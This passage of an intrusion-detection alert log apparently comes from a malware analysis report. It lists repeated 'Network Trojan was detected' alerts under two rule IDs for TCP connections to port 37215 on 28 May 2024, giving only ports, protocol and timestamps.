            SID:2835222
            Source Port:39610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.078571
            SID:2829579
            Source Port:56338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.349899
            SID:2829579
            Source Port:51096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.458203
            SID:2835222
            Source Port:35496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.774093
            SID:2829579
            Source Port:58824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.296049
            SID:2829579
            Source Port:60150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.388387
            SID:2835222
            Source Port:46720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.887641
            SID:2835222
            Source Port:38276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.079346
            SID:2835222
            Source Port:41964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790148
            SID:2829579
            Source Port:48324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919640
            SID:2835222
            Source Port:56864
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.555083
            SID:2829579
            Source Port:55684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818704
            SID:2829579
            Source Port:46750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.293559
            SID:2835222
            Source Port:55488
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.559017
            SID:2829579
            Source Port:59322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.950738
            SID:2835222
            Source Port:55066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048667
            SID:2829579
            Source Port:60212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.377390
            SID:2835222
            Source Port:56292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.760004
            SID:2829579
            Source Port:55078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.857924
            SID:2829579
            Source Port:52216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.999518
            SID:2829579
            Source Port:49734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.275303
            SID:2829579
            Source Port:48100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.783681
            SID:2835222
            Source Port:52344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.634659
            SID:2835222
            Source Port:39770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956960
            SID:2829579
            Source Port:49216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.048116
            SID:2835222
            Source Port:53670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.481056
            SID:2829579
            Source Port:36332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945050
            SID:2835222
            Source Port:39336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.552528
            SID:2835222
            Source Port:45376
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.777089
            SID:2835222
            Source Port:44336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.363776
            SID:2835222
            Source Port:57364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862276
            SID:2835222
            Source Port:59480
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.773584
            SID:2835222
            Source Port:36352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.745531
            SID:2829579
            Source Port:54474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862084
            SID:2835222
            Source Port:35012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.311146
            SID:2829579
            Source Port:44330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.851099
            SID:2829579
            Source Port:53286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.378765
            SID:2835222
            Source Port:48610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.051342
            SID:2835222
            Source Port:51414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880948
            SID:2835222
            Source Port:47800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.436353
            SID:2835222
            Source Port:49408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.768528
            SID:2835222
            Source Port:34010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.842952
            SID:2829579
            Source Port:37164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423652
            SID:2829579
            Source Port:38442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047360
            SID:2829579
            Source Port:47876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.744364
            SID:2835222
            Source Port:35512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.864838
            SID:2835222
            Source Port:52148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.617103
            SID:2835222
            Source Port:55462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.025166
            SID:2829579
            Source Port:33760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.948199
            SID:2835222
            Source Port:33842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.865547
            SID:2835222
            Source Port:59918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919098
            SID:2835222
            Source Port:42500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.602967
            SID:2835222
            Source Port:47906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807463
            SID:2835222
            Source Port:33708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.762034
            SID:2829579
            Source Port:35564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.835926
            SID:2835222
            Source Port:39026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.931778
            SID:2835222
            Source Port:46360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.402580
            SID:2835222
            Source Port:50726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.072612
            SID:2835222
            Source Port:46964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.877788
            SID:2835222
            Source Port:48480
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.989081
            SID:2829579
            Source Port:46752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853923
            SID:2829579
            Source Port:59704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.943482
            SID:2829579
            Source Port:55806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.740239
            SID:2829579
            Source Port:43114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.826090
            SID:2829579
            Source Port:58762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.811332
            SID:2829579
            Source Port:34860
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.943292
            SID:2829579
            Source Port:45700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.934982
            SID:2829579
            Source Port:34318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.309825
            SID:2835222
            Source Port:33398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.752305
            SID:2829579
            Source Port:60100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862241
            SID:2829579
            Source Port:54298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.435201
            SID:2835222
            Source Port:39662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.877568
            SID:2829579
            Source Port:56712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.924907
            SID:2829579
            Source Port:49344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061382
            SID:2829579
            Source Port:50888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.825365
            SID:2835222
            Source Port:37094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.740458
            SID:2829579
            Source Port:57468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.574978
            SID:2829579
            Source Port:42018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.953495
            SID:2829579
            Source Port:46350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.707053
            SID:2835222
            Source Port:56098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.869942
            SID:2829579
            Source Port:43786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919525
            SID:2829579
            Source Port:46372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.622634
            SID:2835222
            Source Port:37608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.767381
            SID:2835222
            Source Port:59530
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857558
            SID:2829579
            Source Port:49084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.670974
            SID:2835222
            Source Port:56028
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.646331
            SID:2829579
            Source Port:39618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759817
            SID:2829579
            Source Port:39134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842135
            SID:2829579
            Source Port:52252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.049253
            SID:2835222
            Source Port:58196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.506973
            SID:2829579
            Source Port:43766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.475620
            SID:2835222
            Source Port:42354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.918655
            SID:2829579
            Source Port:51590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.345009
            SID:2829579
            Source Port:38600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852891
            SID:2829579
            Source Port:41620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.298742
            SID:2829579
            Source Port:57368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.843023
            SID:2835222
            Source Port:60836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.636772
            SID:2835222
            Source Port:35234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.058929
            SID:2829579
            Source Port:50814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.424185
            SID:2829579
            Source Port:52414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767988
            SID:2835222
            Source Port:38040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.851101
            SID:2829579
            Source Port:47082
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.617665
            SID:2829579
            Source Port:58462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.421859
            SID:2829579
            Source Port:52402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.943229
            SID:2829579
            Source Port:46646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979383
            SID:2835222
            Source Port:52746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.073246
            SID:2835222
            Source Port:51660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.772572
            SID:2835222
            Source Port:47708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954582
            SID:2835222
            Source Port:53828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.904057
            SID:2835222
            Source Port:48370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014617
            SID:2835222
            Source Port:35070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.760127
            SID:2835222
            Source Port:32820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.697442
            SID:2835222
            Source Port:37126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.771434
            SID:2835222
            Source Port:37322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.275279
            SID:2829579
            Source Port:58264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.507430
            SID:2835222
            Source Port:40874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.596884
            SID:2829579
            Source Port:55692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.057841
            SID:2835222
            Source Port:44956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543964
            SID:2835222
            Source Port:42320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.559811
            SID:2829579
            Source Port:58422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.503528
            SID:2835222
            Source Port:58186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058316
            SID:2829579
            Source Port:55752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.014895
            SID:2829579
            Source Port:34494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.068174
            SID:2835222
            Source Port:48132
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.656530
            SID:2829579
            Source Port:58144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.845117
            SID:2835222
            Source Port:41454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775710
            SID:2835222
            Source Port:47396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.649711
            SID:2829579
            Source Port:36800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.736140
            SID:2835222
            Source Port:46916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.940206
            SID:2835222
            Source Port:37886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956302
            SID:2829579
            Source Port:53192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.075133
            SID:2829579
            Source Port:37124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.773162
            SID:2835222
            Source Port:36748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870298
            SID:2829579
            Source Port:56420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968250
            SID:2835222
            Source Port:53004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.796039
            SID:2835222
            Source Port:56186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.450639
            SID:2829579
            Source Port:39654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837285
            SID:2835222
            Source Port:47452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.436438
            SID:2835222
            Source Port:39488
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.762484
            SID:2829579
            Source Port:43630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880668
            SID:2829579
            Source Port:41584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.597269
            SID:2835222
            Source Port:37536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.849251
            SID:2829579
            Source Port:54080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.811297
            SID:2829579
            Source Port:54516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.844732
            SID:2829579
            Source Port:52270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790455
            SID:2829579
            Source Port:36644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728151
            SID:2829579
            Source Port:50856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.778376
            SID:2829579
            Source Port:59894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067297
            SID:2835222
            Source Port:55380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.316931
            SID:2835222
            Source Port:46776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.910597
            SID:2829579
            Source Port:38556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767971
            SID:2835222
            Source Port:50626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.382125
            SID:2829579
            Source Port:55032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968061
            SID:2835222
            Source Port:43166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.989038
            SID:2829579
            Source Port:53878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.033765
            SID:2829579
            Source Port:37014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862878
            SID:2835222
            Source Port:49078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.652384
            SID:2835222
            Source Port:58910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.655802
            SID:2829579
            Source Port:58616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.760170
            SID:2829579
            Source Port:40546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.363830
            SID:2829579
            Source Port:58824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.733086
            SID:2835222
            Source Port:41324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.276921
            SID:2829579
            Source Port:38110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290735
            SID:2829579
            Source Port:52968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052704
            SID:2829579
            Source Port:42262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.823759
            SID:2829579
            Source Port:51662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.057856
            SID:2829579
            Source Port:52388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.278072
            SID:2835222
            Source Port:54626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.906432
            SID:2829579
            Source Port:40224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862639
            SID:2835222
            Source Port:44972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326853
            SID:2835222
            Source Port:53444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.900510
            SID:2829579
            Source Port:35584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841869
            SID:2835222
            Source Port:42916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765328
            SID:2835222
            Source Port:41224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.374000
            SID:2829579
            Source Port:34862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879597
            SID:2835222
            Source Port:39740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.872537
            SID:2835222
            Source Port:44058
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.687557
            SID:2835222
            Source Port:45942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748463
            SID:2835222
            Source Port:58958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.516691
            SID:2829579
            Source Port:50856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.387428
            SID:2829579
            Source Port:52538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.289676
            SID:2835222
            Source Port:32964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935177
            SID:2829579
            Source Port:36102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.425907
            SID:2835222
            Source Port:55912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.523696
            SID:2829579
            Source Port:36164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.029352
            SID:2829579
            Source Port:46314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.040670
            SID:2835222
            Source Port:54574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543334
            SID:2835222
            Source Port:47640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.290465
            SID:2829579
            Source Port:42416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.334890
            SID:2829579
            Source Port:51036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.695999
            SID:2829579
            Source Port:51422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.537113
            SID:2829579
            Source Port:39866
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.048028
            SID:2835222
            Source Port:34300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.853644
            SID:2835222
            Source Port:39630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.912191
            SID:2829579
            Source Port:42730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.905804
            SID:2829579
            Source Port:46890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837266
            SID:2829579
            Source Port:45326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809560
            SID:2829579
            Source Port:54680
            Destination Port:37215
